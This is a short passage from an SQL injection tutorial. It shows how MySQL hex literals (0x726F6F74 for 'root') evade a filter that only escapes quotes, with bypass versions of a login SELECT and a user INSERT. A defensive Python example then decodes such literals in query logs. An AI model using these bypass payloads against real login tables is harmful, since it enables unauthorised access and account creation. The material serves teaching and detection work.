SQL Injection Walkthrough part VI (Advanced Vectors part two/end)
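Using a HEX-encoded query to bypass escaping. MySQL accepts a hex literal such as 0x726F6F74 as a string value without any quotes, so a filter that only escapes quote characters leaves it unchanged.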
Normal:
SELECT * FROM login WHERE user = 'root'
Bypass:
SELECT * FROM login WHERE user = 0x726F6F74
Inserting a new user in SQL.
Normal:
insert into login set user = 'root', pass = 'root'
Bypass:
insert into login set user = 0x726F6F74, pass = 0x726F6F74
How to determine the HEX value for injection.
SELECT HEX('root');
gives you:
726F6F74
then add:
0x
before it.
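For reviewing query logs, the reverse direction is the useful one: turning 0x literals back into the strings they stand for. The Python below is an added example, not code from the original post. It decodes the hex literals in the post's queries and shows that a quote-escaping filter passes them through unchanged. It also handles MySQL's X'...' form, which the post does not show. escape_quotes is a hypothetical stand-in for such a filter, and the sample log lines are constructed from the post's queries.

```python
import re

# MySQL hex literal forms: 0x726F6F74 (the 0x prefix is lowercase only) and X'726F6F74'.
HEX_LITERAL = re.compile(r"\b0x([0-9A-Fa-f]+)\b|\b[Xx]'([0-9A-Fa-f]*)'")

def _digits(m):
    return m.group(1) if m.group(1) is not None else m.group(2)

def decode_literal(digits):
    """Inverse of SELECT HEX('...'): hex digits back to text."""
    if len(digits) % 2:  # MySQL pads an odd-length 0x value with a leading 0
        digits = "0" + digits
    return bytes.fromhex(digits).decode("utf-8", errors="replace")

def find_hex_literals(query):
    """Return (literal_text, decoded_text) for every hex literal in a logged query."""
    return [(m.group(0), decode_literal(_digits(m))) for m in HEX_LITERAL.finditer(query)]

def reveal(query):
    """Rewrite a logged query with each hex literal shown as a quoted string."""
    def repl(m):
        return "'" + decode_literal(_digits(m)).replace("'", "''") + "'"
    return HEX_LITERAL.sub(repl, query)

def escape_quotes(value):
    """Hypothetical stand-in for a filter that only escapes quotes and backslashes."""
    return value.replace("\\", "\\\\").replace("'", "\\'")

# Constructed sample log lines, built from the queries shown in the post.
SAMPLE_LOG = [
    "SELECT * FROM login WHERE user = 'root'",
    "SELECT * FROM login WHERE user = 0x726F6F74",
    "insert into login set user = 0x726F6F74, pass = 0x726F6F74",
]

if __name__ == "__main__":
    # The filter has nothing to escape in a hex literal, so it is returned as-is.
    print(escape_quotes("0x726F6F74"))
    for line in SAMPLE_LOG:
        hits = find_hex_literals(line)
        if hits:
            print("hex literal(s):", hits)
            print("  reads as:", reveal(line))
```
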